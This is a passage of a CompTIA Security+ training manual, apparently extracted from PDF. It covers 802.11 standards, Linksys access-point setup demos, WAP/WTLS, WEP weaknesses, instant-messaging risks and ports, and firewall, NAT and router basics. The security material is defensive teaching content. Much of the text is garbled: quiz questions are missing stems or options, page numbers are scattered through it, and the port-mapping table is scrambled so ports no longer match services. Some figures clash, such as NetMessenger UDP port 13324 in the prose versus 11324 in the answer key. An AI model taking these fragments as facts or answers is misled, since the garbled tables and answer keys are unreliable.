Working group 802.11a Primary task Worked to establish specifications for wireless data transmissions in the 5 GHz band Worked to establish specifications for wireless data transmission in the 2.4 GHz band Worked to establish wireless MAC bridging functionality Working to determine requirements that will allow 802.11 to operate outside the United States Worked to add multimedia and Quality of Service (QoS) capabilities to wireless MAC layer Worked to allow for better roaming between multivendor access points and distribution systems Worked to provide raw data throughput over wireless networks at a rate of up to 54 Mbps Worked to allow for European implementation requests regarding the 5 GHz band Worked to fix security flaws in WLANs by developing new security standards Worked to address meeting Japanese government requirements for 4.9 to 5 GHz band use. Status of work Approved 1999
802.11b
Approved 1999
802.11c
802.11d
Approved 2001
802.11e
Approved 2005
802.11f
Approved 2003
802.11g
Approved 2003
802.11h
Approved 2004
802.11i
Approved 2004
802.11j
Approved 2004
The IEEE is dealing with all of the technology issues that arise as it tries to set standards for wireless data transmission and processing. At some point, all of these groups will have completed their work, and other challenges will arise that need to be dealt with as time goes on.
86
Do it!
A-1:
B
C D
3 Which of the following data transmission rates does 802.11b support? (Choose all that apply.) A
B
C
D
5 Which of the following working groups is responsible for fixing the security flaws in WLANs? A
B
C D E
87
A-2:
Heres how
Introduce this activity as a demonstration. Students should observe only.
1 Connect the Category 5 Ethernet network cable to the Linksys WAP11 Access Point
2 Connect the other end of the cable to the classroom switch or hub 3 Connect the AC Adapter to the WAP11 power port and to an electrical outlet
Use the Instructors PC to demonstrate the installation procedure.
The Access Point is now connected to your 10/100 network. To avoid damage to your unit, only use the power adapter supplied with the Access Point.
4 At the laptop PC, insert the Linksys Setup Wizard CD in the CD-ROM drive
The Welcome Screen appears. If the autorun program does not start, choose Start, Run, and enter D:\setup.exe (if D: is your PCs CD-ROM drive).
5 Click Setup
6 Click Next
88
Click Yes 8 In the Password field, enter the default password, admin
Changing the SSID field from the default is important in order to protect the LAN from intrusion.
Click Next
89
(To continue through the Security (Optional) screen.) The Confirm Your Network Settings screen appears.
Click Exit
(To complete the basic setup.) The Access Point is now configured for the classroom network.
810
811
812
813
These protocols were based on the International Organization for Standardization OSI Model, but were different enough from it to require that data communications between clients (wireless devices) and servers pass through a WAP gateway, which in effect converts the data from one type of network protocol to another. The Wireless Application Layer (WAL) corresponds to the HTML layer, but unlike the HTML layer, which allows for a wide variety of content formats that can consume large amounts of processing power and be displayed on large computer screens, WAE was designed only to specify lightweight formats, such as text and image formats, and to leave decisions related to browser types, phonebooks, and the like to device vendors. The Wireless Session Protocol (WSP) provides connection- and connectionlessoriented session standards that require a relatively limited amount of information exchanges between the wireless device and the server compared to the number of information exchanges required between a wired device and the server. Connection-oriented session services that require reliable data transmission operate over the Wireless Transaction Protocol (WTP) layer while connectionless-oriented session services operate over the Wireless Datagram Protocol (WDP). The WTP operates over the WDP or the optional WTLS layer. This layer allows for either reliable or unreliable transactions and, like other WAP 1.x layers, has been designed to limit the number of transactions necessary to allow data transport, relative to the number of transactions necessary in the OSI/Web stack. The Wireless Datagram Protocol (WDP) is the bottom layer above the carrier layer. WDP differs greatly from the UDP layer of the OSI/Web stack in that it allows operability of a great variety of mobile networks while the UDP layer must operate over an IP network. Another significant difference between wireless and wired data transfer lies in the network architectural structures of the two network types. Exhibit 8-3 illustrates the differences between a WAP network and a wired networks architecture.
814
815
B-1:
B C D
2 The WAP 1.x lower layer is similar to what layers of the OSI Model? (Choose all that apply.)
A B C
3 WAP is a proprietary encryption protocol that was created by WECA. True or false?
False: It was created by the WAP Forum.
In the WAP client In the WAP gateway Between the WAP client and the application server Between the WAP gateway and the application server None of the above
C D E
816
817
This process works quickly, and requires less overhead, largely because WTLS is using weaker keys than TLS, which does not require very much processing time. Remember that in WAP 1.x, WTLS is optional, so it might not even be turned on, and it only encrypts data between the client and the WAP gateway. The WAP gap is still present between the time the gateway has finished decrypting the data and when it encrypts it with TLS before sending it to the application server. SSIDs Another area of concern is the unsafe use of service set identifiers (SSIDs). SSIDs are wireless network names, which are sent with wireless data packets to help devices identify each other in a wireless network. The default SSID values should never be used, nor should SSIDs that help unscrupulous hackers with sniffers to identify your WLAN. These would include such SSIDs as 12th Street Branch Accounting Department or ABC Consulting Firm. Giving your wireless devices more cryptic SSIDs help reduce the likelihood that a hacker will be able to compromise your WLAN(s). Weak encryption keys The weak key used by WTLS has been widely criticized. Some WAP supporters have responded to these criticisms by arguing that the shortcuts taken in WTLS were necessary in order for WAP to adapt to the wireless environment. These weaknesses are real and should be considered when transmitting sensitive information using a WAPenabled device. Although many vendors have already made improvements to WAP 1.x-enabled devices with higher levels of encryption and more efficient processing, it cannot be emphasized enough that WTLS cannot be taken for granted even if the vendor has made these improvements, or even if they simply state that their application incorporates WTLS.
818
Exhibit 8-4: A comparison of WAP 1.x and 2.0 stacks In addition to these changes, WAP 2.0 has added a number of features. These include, but are not limited to: WAP Push Allows content providers to send information, such as stock prices and advertisements, directly to the WAP device without being requested to do so. User agent profile Allows a way to capture and communicate WAP device capabilities and user preferences. Wireless Telephony Application Provides a range of advanced telephony applications including such call-handling services as making, answering, placing, or redirecting calls. External Functionality Interface (EFI) Allows the use of plug-and-play modules to extend the features of the clients applications. It also allows the addition of smart cards, GPS devices, health care devices, and digital cameras. Multimedia Messaging Service (MMS) Provides a framework to enable a richer messaging solution.
819
B-2:
2 WTLSs Class 3 authentication requires the use of a tamper-resistant device called a ________________________________________.
Wireless Identity Module (WIM)
3 Put the steps below in the correct sequence to describe a Class 2 authentication. ___ The client generates a unique random value and encrypts it with the public key. ___ The gateway sends a copy of its certificate containing its public key. ___ The client sends a request for authentication to the gateway. ___ The gateway decrypts the encrypted value with its private key. 4 What are SSIDs?
SSIDs are wireless network names, which are sent with wireless data packets to help devices identify each other in a wireless network. 3
2 1 4
D E
820
Do it!
B-3: Controlling access to the WAP (demonstration only) Heres how Heres why
The Access Point is designed to be functional right out of the box. To implement greater security on your wireless network, you will use Linksyss Web-based configuration utility. (For example, http://192.168.1.251.) The system prompts you for a user name and password.
Introduce this activity as a demonstration. Students should observe only. Steps 1-13 should be done on the Instructors computer.
2 In the Address field, enter http:// followed by the IP Address of your Linksys WAP 3 Leave the user name blank In the Password field, enter
admin
Click OK
The configuration utility with the Setup tab active appears. This tab allows you to change the Access Points general settings.
4 Review the settings but leave the AP Name, LAN IP Address, and AP Mode settings at their default values
The AP Name and LAN IP Address were set during the initial setup.
The AP Mode is set to Access Point by default. This connects your wireless PCs to a wired network.
821
To communicate with another Wireless Access Point, you have two options: (1) If within the same network, choose Access Point Client. This will make this WAP a client to the other WAP. (2) If you want to connect two networks together, select Wireless Bridge. This will make the connection to another access point set as a wireless bridge. In both cases, you would specify the other WAP MAC address. To connect three or more networks together, choose Wireless Bridge-Point to MultiPoint. 5 Activate the Password tab
6 Enter a new password Re-enter the new password to confirm 7 Click Apply 8 Enter the new password and click
OK To avoid using the default password. Be sure to choose a complex password. To save the change. To return to the utility
The Filter tab appears. One method of restricting wireless devices is to create a list of approved users. A list of preapproved media access control (MAC) addresses can be entered into the Filtered MAC Address table in the access point. Only those stations on the ACL will be provided admittance. The Linksys WAP11 provides an option to create and manage an ACL.
10 Select Enabled
Filtering is enabled.
822
12 In the MAC 01 field, enter the MAC Address of the wireless adapter in the computer with the wireless adapter (laptop or desktop) 13 Click Apply
This step and the next are done on the computer with the wireless network adapter.
14 From the computer with the listed MAC Address, load Internet Explorer 15 Enter the IP Address of the WAP in the Address field
The page fails to load.
In the MAC 01 field, enter the MAC Address of the wireless adapter in the computer with the wireless adapter Click Apply
This step and the next are done on the computer with the wireless network adapter.
17 From the computer with the listed MAC Address, retry to access the WAP using its IP Address
823
Introducing WEP
Explanation Wired Equivalent Privacy (WEP) is the optional security mechanism that was specified by the 802.11 protocol to provide authentication and confidentiality in a wireless LAN (WLAN) environment. Even though the IEEE committee recommended that WEP should be used, it also stated that WEP should not be considered adequate security and strongly recommended that it should not be considered without also implementing a separate authentication process and providing for external key management. Before delving into WEP, however, you must first gain an understanding of what a WLAN is and how it operates. A WLAN works to connect clients to network resources using radio signals to pass data through the atmosphere, as depicted in Exhibit 8-5.
Review with students the operation of a typical wireless LAN as depicted here. Notice that critical resources, such as servers and internetwork devices, are still connected using wired technologies so WLANs are frequently really hybrids that incorporate both wired and wireless components.
824
CompTIA Security+ Certification In order to do this, it employs wireless access points (AP), as shown in Exhibit 8-6, which are connected to the wired LAN and act as radio broadcast stations that transmit data to clients equipped with wireless network interface cards (NICs), as shown in Exhibit 8-7.
Exhibit 8-7: 3 Com AirConnect wireless NIC This allows users to stay connected to the network as they move around from place to place within and between the broadcast zones of the various access points (APs) within the WLAN. WLANs use WEP to encrypt and guarantee the integrity of the data passed between the client and the AP and to authenticate clients that are requesting network resources.
WEPs weaknesses
WEP has been criticized for having many problems, including problems related to the initialization vector (IV) that it uses to encrypt data and ensure its integrity, and also problems with how it handles keys.
825
An IV is a sequence of random bytes that have been appended to the front of the data, which is in plaintext before encryption. There are several problems with the IV: WEP sends the IV in plaintext across the WLAN and, therefore, it can be picked up by a hacker along the way. The WEP IV is only 24-bits long, which means that it can only take 224 (16,777,216) values. The IV is reused on a regular basis. An individual could capture packets and see the pattern of reuse, thus revealing the IV. Researchers have actually broken the 128-bit WEP encryption in as little as two hours using this method. In August 2001, Fluhrer, Mantin, and Shamir published a paper titled Weaknesses in the Key Scheduling Algorithm of RC4. In it, they described an attack that could be made using weak keys created by WEPs IV. They also criticized the fact that the RC4 stream cipher, though effective in many other instances, is rendered useless in WEP because it encrypts messages by concatenating a fixed secret key and known IV modifiers. Key sharing Others have criticized WEP for not requiring asymmetric authentication in which each wireless device would employ its own secret key. At this point, every wireless device in a WLAN shares a common secret key, which means the likelihood of that key getting into the hands of someone who wishes to harm the organization is increased. For example, standard WEP requires the secret keys be manually configured. Rational security implementation then dictates the secret key be changed on every device every time someone leaves the company, if not more frequently, but this would be an administrative nightmare in large organizations. A symmetric key system, in itself, does not do anything to protect critical information from authorized WLAN members who can, intentionally or unintentionally, gain access to resources to which they are not authorized access. Another weakness related to the difficulty associated with rekeying is that if it is not done regularly, hackers have even more time to break into the system. War driving and other issues In addition to the WEP related problems that have been discussed so far, wireless LANs have other security holes. For example, WLAN transmissions can, and often do, extend beyond the confines of the physical structures of the organizations that use them, unlike wired LANs, its much, much easier for people to detect and capture them. Several articles, in such widely read publications as PC Magazine and the Wall Street Journal, describe the amount of information about an 801.11b WLAN that can be collected through war driving. War driving involves driving around using a laptop equipped with a wireless card and an antenna. Craig Ellison wrote an article for PC Magazine in 2001 that described how he was able to use this method to detect 61 APs within a six-block radius of the Ziff Davis office in Manhattan. Of these, only 21% of the networks had actually enabled WEP. The other 79% were broadcasting their transmissions out in plaintext for anyone to pick up. On other war driving trips through Jersey City, Boston, and the Silicon Valley, Ellison easily found 808 networks and only 38% of them were using WEP.
826
CompTIA Security+ Certification In addition to war driving, which is a fairly passive activity, unauthorized users can attach themselves to WLANs and use their resources, set up their own access points, and jam the network in a denial-of-service attack, or use the previously mentioned WEP weaknesses to break into wired LANs by attaching themselves to WLANs that are not separated from the wired LAN by a DMZ. WEP authenticates clients, not users. Unless an additional security method is employed, such as requiring users to provide username/password sets, anyone who gains access to a client that has the shared key is able to break into the system. 802.11i will help in this area, but perhaps the greatest need is in the area of educating wireless network administrators and users about the inherent insecurity of wireless systems and the need for additional care when using them.
WEP key
The 802.11 standard provides an optional Wired Equivalent Privacy (WEP) specification for data encryption between wireless devices to increase privacy and prevent eavesdropping. The access point and each station can have up to four shared keys. Each key must correspond to the same key position in each of the other devices.
827
C-1: Generating a WEP key (demonstration only) Heres how Heres why
The WEP Key Setting window appears. This window allows you to set WEP encryption.
4 Select 128Bit encryption Leave the Mode set to HEX 5 In the Passphrase field, enter
Paganini1 Your screen should look like this:
Each point in your wireless network MUST use the same WEP encryption method and encryption key or else your wireless network will not function properly.
828
7 Click Apply 8 Close the window 9 Click Backup Save the file to your local hard drive 10 Click Apply 11 At this point, you would configure each device in your wireless network with the same configuration and encryption keys. 12 On the Setup window, select Disable under WEP 13 Click Apply
To save the changes. To return to the Setup tab. To store the Access Point configuration on your local PC.
To complete the setup. Automated key generation can only be done when the network adapter is the same brand and model as the WAP. If not, you would need to manually enter the encryption keys in each wireless device. To disable encryption.
829
C-2:
It is only 24 bits long It creates weak keys It is reused on a regular basis, allowing the hacker to see the pattern of reuse
830
831
Pay particular attention to materials used to construct the walls, floors, and ceilings of the building. Certain materials tend to reflect some of the signal. Concrete, marble, brick, water, and especially metal are difficult to work around. Doing a walk-through of the site After getting an idea of the layout of the site from the blueprints, its important that you walk through the site to make sure the blueprints are accurate and to identify any other barriers that might affect radio signals. For example, you might notice that partitions, metal racks, or file cabinets have been placed in areas that originally appeared to be wide open. As you walk through the site, you need to identify other devices that operate in the same radio frequency band as your WLAN, such as microwave ovens, medical equipment, military communications equipment, and baby monitors. You also want to observe whether or not there are existing wired network jacks and power outlets that you can use to connect to the physical network and provide electricity to your access points. You might need to determine in which areas of the building it might not be esthetically pleasing to locate an access point and plan to make concessions for that space (such as the company boardroom). Identifying possible access point locations Using the information you have gained in the preceding steps, you should be able to approximate the locations of the access points that will provide adequate coverage for mobile users. Areas that have high concentrations of mobile users require more access points; however, you also need to be mindful of not placing access points too close together in order to reduce interference between access points. You should also have noticed where physical network jacks and electrical sockets need to be installed. Consider the power needs of the wireless workstations that will be in each area and the different types of antennas that might be needed in different spaces. Confirm that environmental conditions are good (not too hot or too cold). Once all of this information has been taken into account, you need to create a draft design of the network from which to work as you go through the next step. Verifying access point locations Before you finalize your network plans, you need to verify your initial approximations of AP location are correct. To do this, you need the proper tools, including at least one access point (and a power cord to connect it to a source of electricity), a laptop equipped with a wireless NIC, and software that can be used to identify the AP and monitor data rates, signal strength, and signal quality. Most wireless equipment vendors include this software with the AP or the wireless NIC, but you can also download free software from wireless LAN vendors, such as Cisco, 3Com, and Symbol. Some vendors provide you with software that not only tests your signal strength, but also provides you with a printout of the results, which will be helpful in your posttest documentation.
832
CompTIA Security+ Certification Once you have gathered all of the appropriate tools, you are ready to begin testing. 1 With your draft design in hand, go to each of the points that you have identified as potential good locations for an AP, place the AP in those locations, and monitor the site survey software to see what the results are as you walk around the intended space. 2 You should also test for the amount of data throughput that is possible at various points in the space. 3 Take detailed notices of these results and identify where you find strong and weak signals. 4 If you are finding weak or dead spots, you need to reposition the AP until you have full coverage of the space. In some cases, you might not find an ideal location and will need to consider adding an additional access point in a location to solve the problem. Documenting your findings Now that you have tested your initial assumptions about AP locations and made any adjustments that were necessary, you need to document your findings. Your final plan will allow for adequate wireless coverage in any area that the users indicated they would need it. Careful drawings should be made and a list of your assumptions should be spelled out. The people who will install the wireless system that you have designed will use your documentation, as might the network administrators who will support the wireless network. In addition, a great amount of time, energy, and money will be saved in the future if the network needs to be upgraded or expanded, as long as your documentation is precise and thorough.
833
C-3:
Heres how
Introduce this activity as a demonstration. Students should observe only. For this activity, you will need a laptop with a Netgear MA401 PC Card installed. If the Wireless Status icon is not displayed in the system tray download and install the latest version of the Netgear MA401 driver.
If you have a different wireless network card, you can right-click the wireless connection icon in the system tray and choose Status. The screens will look different than those shown here, but will have similar information.
3 Monitor the following output: Current Tx Rate Signal Strength Link Quality
Ask a student to roam about the room and identify any objects that influence the signal strength and quality.
4 Roam around the room with the laptop and watch for any changes in transmission rate, signal strength, and link quality
834
Do it!
C-4:
2 Why is it important to document your findings when conducting a wireless site survey?
The documentation is important to communicate your findings in the wireless site survey. The people who will install the wireless system that you have designed will use your documentation, as will network administrators. Its essential to have this information for support purposes on the wireless network. In addition, a great amount of time, energy, and money will be saved in the future if the network needs to be upgraded or expanded, as long as your documentation is precise and thorough.
835
C-5:
Heres how
Introduce this activity as a demonstration. Students should observe only.
1 In the Linksys utility, activate the Password tab 2 At Restore Factory Defaults, click on Yes
3 Click Apply
To save the changes. The system warns that your connection might be lost.
To proceed to reset the WAP to the factory defaults. Your connection will be terminated.
836
A definition of IM
Explanation With the proliferation of instant messaging (IM) products comes an equal proliferation of problems and security threats. Five currently available and frequently used flavors of IM include: AOL Instant Messenger (AIM), MSN Messenger, Yahoo! Messenger, ICQ, and Internet Relay Chat (IRC). Each of the five has suffered at least one major security problem. In addition to the security problems inherent in each product, there is also a series of generic problems that a technology manager faces when trying to lock down IM. Unlike e-mail, which uses a store and forward model, IM uses a real-time communication model. When you type a message into an IM client and press the Enter key, the text of that message is immediately sent to the client(s) to which you are currently connected. This model makes IM easy, fast, and extremely dangerous. IM networks operate in either peer-to-peer or peer-to-network configuration. In the peer-to-peer model, client software communicates directly with one another; in the peerto-network model, client software logs onto a network, which then transfers the messages between clients. Both models have pros and cons. The peer-to-peer model does not rely on a central server; so as long as two client software packages are not blocked, they can communicate with one another. This model might cause the client to expose sensitive information such as the actual IP address of the machine on which it is running. The peer-to-network model relies on a central server (or group of servers) and, therefore, there is a risk of a network outage making IM communication unavailable. In addition, denial-of-service (DoS) attacks are becoming more frequent, and this increases the likelihood that IM might not be available when you need it.
IM security issues
The instant messenger client is typically installed on an end-users workstation and provides an interface for end-users to communicate with each other by utilizing the server resources. The server manages and relays all end-user communication and is typically maintained by a service provider such as AOL, Yahoo!, or Microsoft. The server is also responsible for the authentication and notification of user status and availability.
837
Increased deployment of broadband networks, as well as availability of extra capacity in many networks, make instant messaging tools a very popular way of communication both at home and in the work place. The increased usage of these tools also brings about certain vulnerabilities that many organizations fail to understand and address. Many of these services, although very convenient, do not have the security and encryption features that are essential for transportation of sensitive and confidential data. There are serious security concerns regarding the usage of consumer IM systems because these systems can transport sensitive and confidential data over the public networks in an unencrypted form. Corporations have no control over data transported in such fashion once it leaves the corporate network infrastructure. On the other hand, enterprise IM systems are administered in-house, making them considerably more secure than the consumer IM systems. Most popular consumer IM systems share some common security risks that need to be addressed: IM systems typically do not prevent transportation of files that contain viruses and Trojan horses. Such files can spread these dangerous viruses and cause systems to malfunction or cease to function altogether. Misconfigured file sharing can provide access to sensitive or confidential data including personal data, company information, and system passwords. The most visible security risk associated with most IM systems is the lack of encryption. Such applications transfer data in plain HTML format, which can easily be intercepted by an intruder. Sensitive information should always be encrypted and digitally signed before transporting over a public network. The use of a plaintext session can also lead to the session being hijacked, which can be further exploited to obtain sensitive information. IM systems could be utilized for transportation of copyrighted material, which could have substantial legal consequences. These include copyrighted pictures, documents, music files, software, and so forth. Transferring files also reveals network addresses of hosts, which could be used by attackers for malicious purposes such as a Denial-of-Service attack. IM applications typically do not use well-known TCP ports for communication and file transfers; instead, registered ports are used: AOL Instant Messenger uses TCP port 5190 for file transfers and file sharing, but transportation of IM images takes place on TCP port 4443. NetMessenger uses TCP port 1863 for transportation of HTML-encoded plaintext messages. Voice and video feed is relayed via a direct UDP connection on ports 13324 and 13325. Application sharing takes place between clients over TCP port 1503, and file transfers use TCP port 6891 on the initiator or client. Yahoo!s Messenger typically uses TCP port 5050 for server communication and TCP port 80 for direct file transfers. ICQ messages are also unencrypted and sent via TCP port 3570, and voice and video traffic uses UDP port 6701.
838
CompTIA Security+ Certification Safeguards One can configure the firewall to filter some or all of these ports in order to restrict either certain functionalities within corresponding IM applications or to prevent usage altogether. It might be difficult to block the usage of IM systems such as Yahoo!s Instant Messenger because most of its traffic takes place over TCP port 80, which is the standard TCP port for regular Internet traffic. In situations like this, it is also possible to prevent usage by denying access to certain domains because, for instance, Yahoo! Messenger requires the user to be logged onto a specific subdomain. Smart systems such as intrusion detection systems (IDS) could be deployed to monitor and prevent IM traffic. You can have your IDS inspect all inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break into or compromise a system.
839
The ability to send a file through IM is extremely powerful, but also very dangerous. Unlike e-mail attachments, which can be scanned as they arrive on a corporate server, IM attachments are much more difficult to handle and require an antivirus package on the local machine receiving the attachment. Application sharing The ability to remotely control a computer can be a boon to help desk operators, but it raises several issues. If the remote control software can be triggered by the remote site, then a machine with IM software running might be taken over without anyone knowing it. In addition, if the remote control software is being used by the remote site to connect to a local site that has been physically breached, then all of the actions of the controlling client might be seen by the wrong party.
Blocking IM
Blocking the use of IM is a straightforward task. If you install a corporate firewall of some sort to block the ports that IM products use, you will make IM unavailable to your employees, as limited blocking of IM is not possible at this time. If your employees should make a convincing case that IM is useful, then the best that can be done is make strong policies and limit IM clients to one or two vendors so you can maximize control.
840
Do it!
D-1:
B
C D
These applications typically do not incorporate encryption mechanisms. Misconfigured file sharing within IM applications can lead to unwanted access to personal data. IM applications have built-in mechanisms that prevent the spreading of viruses. None of the above.
3 Specify the TCP or UDP port used for each of the following applications. AOL file transfers NetMessenger messages NetMessenger voice and video traffic NetMessenger file transfers Yahoo! Messenger file transfers ICQ messages ICQ voice and video traffic
TCP port 5190 TCP port 1863 UDP ports 11324 and 13325 TCP port 6891 TCP port 80 TCP port 3570 UDP port 6701
IM uses real-time communications: transaction logging is optional. Messages are passed in plaintext format by default. If a hacker can gain access to an unguarded terminal, he or she can pose a quick
question that requires an immediate response on the part of the person being questioned.
Each client must have antivirus software installed to scan IM messages for viruses. A machine running IM software can be taken over with remote control software without
anyone knowing it. In addition, if the remote control software is used to connect to a local site, all the actions of the controlling client can be seen by the wrong party.
841
5 What are some of the legal issues surrounding Instant Messaging software in the workplace?
IM carries with it a possible threat of litigation or even criminal indictment should the wrong message be sent to or received by the wrong person (similar to e-mail). Corporations spend millions each year to safeguard themselves from legal issues surrounding the proper use of e-mail. Many times businesses have even gone so far as to monitor the content of messages to ensure that their employees say nothing inappropriate.
842
Topic B
Topic C
Topic D
Review questions
1 One way to secure a wireless network is to use a: A Firewall B Scrambler
C
VPN
D DMZ 2 A recommended practice for wireless LANS is to: (Choose all that apply.) A Disable file and print sharing B Disable NetBEUI
C D
E All of the above 3 Which of the following can interfere with wireless transmission? (Choose all that apply.)
A
Brick walls
B Cell phones
C D
Wireless and instant messaging 4 The 802.11a standard can use which of the following bands? A 2.4GHz
B
843
5GHz
C 2.4MHz D 5MHz 5 The 802.11b standard can use which of the following bands?
A
2.4GHz
B 5GHz C 2.4MHz D 5MHz 6 The 802.11a standard can transmit data at speeds of up to _____Mbps. A 11 B 36 C 48
D
54
WEP
C WSP D WDP 8 The IEEE working group F has been tasked with creating a standard to allow for better roaming between access points and distribution systems. True or false?
True
9 Which of the following is part of the WAP 1.x stack? (Choose all that apply.)
A B
WAE WTP
C WSSL
D
WDP
E WIP
844
CompTIA Security+ Certification 10 WAP 2.0 has added a number of features that include which of the following? (Choose all that apply.) A WAP Push B User agent profile C Wireless Telephony Application D External Functionality Interface (EFI) E Multimedia Messaging Service (MMS)
F
11 Instant messaging networks operate in either ______________ or ___________ configurations. (Choose all that apply.)
A
peer-to-network
B network-to-network C client/server
D
peer-to-peer
5190
B 5050 C 80 D 1023
91
detection systems.
G Perform network monitoring.
92
Firewall concepts
Explanation There are really only two principal ways to secure a computer or network of computers from external breach: either physically isolate the computer or network from the outside world by disconnecting the network and telecom cables that provide contact with any other computers or networks; or virtually isolate the computer or network by implementing a firewall to stand guard between the outside world and the computer or network. A firewall is a barrier that isolates one network from another. Its main function is to protect an internal, private network from unauthorized access by an external, public network. The firewall can be a dedicated physical device or a software feature added to a router, switch, or other similar device. There are many ways to build a network firewall, but the following five steps will ensure that you have not missed anything: 1 Draft a written security policy. A well-written security policy ensures that the necessary blend of security and services is provided to the organization. 2 Design the firewall to implement the security policy. 3 Implement the firewall design by installing the selected hardware and software. 4 Test the firewall. Its fine to say you have a firewall, but if it doesnt work as intended, it might give you a false sense of security, increasing potential risk. 5 Review new threats, requirements for additional security, and updates to adopted systems and software. If additions or modifications are necessary, repeat the process from step one, in light of these changes. This is the management cycle for firewall protection, but the requirements of each, especially the first item, are often minimized or skipped, because most corporate managers find network security to be an arcane subject.
Network devices
93
Scan for services that were not explicitly authorized by the company. Some employees might setup ad hoc FTP servers or Web servers, so it is critical to scan for open ports at all addresses. In addition, consider who might want to circumvent your security measures, and identify their motives. The types of hackers range from sport hackers, who are satisfied with merely penetrating your defenses, to hackers whose intent is causing damage or theft. Which services should be made available? In answering the third question, you should catalogue which services need to be available to your companys employees. Available services might provide access to intruders, so its imperative you lock out those services that are not needed. The following table is a table of common port mappings:
Service Dial Pad DNS FTP ICQ IPSEC IRC (Estimation) HTTP HTTPS NetMeeting NNTP Novell VPN software (BorderManager) pcAnywhere 2.0, 7.0, 7.50, 7.51 POP3 PPTP SMTP SSH SNMP Telnet TFTP AOL Instant Messenger 5190, 4443 TCP port # 51210 53 20, 21 4000 500 6661-6667 80 443 389, 522, 1503, 1720, 1731 119 353, 2010, 213 65301 110 1723 25 22, 1019-1023 161 23 69 22, 1019-1023 22 443 1080-6660 UDP port # 51200, 51201 53
By blocking those ports that correspond to services you do not need, your system will be more secure.
94
CompTIA Security+ Certification Who gets access to which resources? In addition to determining which services are required, you must determine who should have access to which resources within your network. You should list the employees or groups of employees along with the files, file servers, databases, and database servers to which they need access. In addition, you should list which employees need remote access to the network. Who administers the network? This question is easily answered, as it will be you who will be administering the network. On larger networks, however, there might be more than one person responsible for administering the network. These people, and the scope of individual management control, need to be determined up front.
Do it!
A-1:
2 What are the recommended steps to build a network firewall? (Choose all that apply.) A B C D E
F
Draft a written security policy. Design the firewall to implement the security policy. Implement the firewall design by installing the selected hardware and/or software. Test the firewall. Review new threats. All of the above.
3 One of the steps to drafting a security policy is to catalogue which services need to be available to your companys employees and lock out all services that are not needed. True or false?
True
Network devices
95
96
CompTIA Security+ Certification Port address translation PAT guarantees a unique connection by using a combination of an IP address and a TCP or UDP port, called a socket, rather than the address alone. When an internal system connects to an external resource, it typically selects a short-lived source port to create a unique socket. When the request routes through the NAT, the IP address is changed to a public address and a short-lived port is selected that guarantees uniqueness. A table of the source address, source port, NAT source IP, NAT source port, destination IP, and destination port is maintained by the router. The combination of NAT source IP and NAT source port and destination IP and port are guaranteed to be unique. PAT is really a subset of NAT and is now available in very inexpensive routers available for home use. This provides a useful method for conserving IP addresses, as well as concealing internal system identities. A drawback of this method is with the servereach external IP address can only support a single process on any given port, although the NAT router can direct these connections to different internal systems. NAT with port address translation is shown in the following table:
Inside Source Address: Port 10.1.1.2:1100 10.1.1.3:1200 Outside Source Address: Port 192.50.20.1:1024 192.50.20.1:1025 Outside Destination Address 192.50.20.2 192.50.20.3
Basic packet filtering After NAT, the most basic security function performed by a firewall is packet filtering. Packet filters decide whether to forward individual TCP/IP packets based on information contained in the packet header and on filtering rules set by the network administrator. Most packet filters can be configured to screen information based on the following data fields: protocol type, IP address, TCP/UDP port, and source routing information. Improper filtering can end up blocking valid packets or permitting rogue packets. For a more thorough discussion of network packet handling, see the section on routers later in this unit. Stateful firewalls Stateful firewalls represent a major advancement in firewall technology. They keep a record of every network connection in which they participate. They can record sessionspecific information, including which ports are in use on the client and server. This is important because, although most Internet services run on well-known ports, Internet clients might be using any port above 1023. A basic (stateless) packet filter must let Web servers respond to browsers at one of these high port numbers, but it cant tell which one, so it leaves them all open. Stateful packet inspection enhances security by allowing the filter to distinguish on which side of the firewall a connection was initiated. This latter feature is essential to blocking IP spoofing attacks. A stateful packet filter monitors the three-way handshake that initiates a TCP connection. Only TCP packets that are identified as being a part of the handshake, or can be identified with an established connection, are allowed through the firewall.
Network devices
97
Some filters even respond to connection requests on behalf of the internal server until the three-way handshake is properly completed by mimicking the connection to the internal server, and then they begin passing packets once the connection is made. Once a session is properly ended or times out, no additional packets are allowed on that connection without a new three-way handshake. This is an effective countermeasure against SYN floods. Access control lists Traffic filtering is available through access control lists (ACL). A Cisco router provides different levels of filtering; using either the standard or the extended list (the latter allows filtering by different criteria). The basic syntax is as follows:
access-list list_number network_mask access-list 101 permit/deny source_IP_address
For example, to stop any inbound packet with an internal (spoofed) source IP address:
deny 10.13.31.0 0.0.0.255
At the same time, to let all outbound internal packets through with a legitimate source IP address include:
access-list 102 permit 10.13.31.0 0.0.0.255
Access lists are executed from first statement to last until a match on the inspected packet is found, then all processing of the list stops, and the rule of the first match is applied. There is an implied deny everything else at the end of every list so if no matches occur, the packet is denied by default.
98
Do it!
A-2:
2 The problem with basic NAT is that each active connection requires a unique external address for the duration of the communication. True or false?
True
3 Stateless packet filters can record session-specific information about the network connection. True or false?
False: Stateful packet filters do this.
4 Which of the following data items is found in the port address translation table? (Choose all that apply.) A B C D
E
Source address NAT source port NAT source IP address Destination port All of the above
5 Most packet filters can be configured to screen information based on the protocol type, IP address, TCP/UPD port, and source routing information fields. True or false?
True
6 Access control lists work by blocking all inbound packets. True or false?
False: They can either allow or block inbound or outbound packets for specific IP addresses.
Network devices
99
Topic B: Routers
This topic covers the following CompTIA Security+ exam objective:
# 3.1 Objective Understand security concerns and concepts of the following types of devices Routers
Introducing routers
Explanation A router is a network management device that sits between different network segments and routes traffic from one network to another. This role of digital go-between is essential because it allows different networks to communicate with one another and allows the Internet to function. With the addition of packet filtering however, routers can take on an additional role of digital traffic cop.
910
CompTIA Security+ Certification Demilitarized zone (DMZ) The demilitarized zone (DMZ) is the area that a company sets aside for servers that are publicly accessible or have lower security requirements than other internal servers. The DMZ gets its name from the traditional setup of a network segment between two routers. This environment neither is subject to the unsecure environment of the Internet, nor is it fully protected by the internal routerhence it is demilitarized. The DMZ is commonly home to public Web, FTP, and DNS servers that need to be accessed by the public. This is also a typical location to place remote dial-up access, providing defense in depth with the interior router. If a hacker gains access to the RADIUS server, he or she still must authenticate through the internal firewall. This can be seen in Exhibit 9-1.
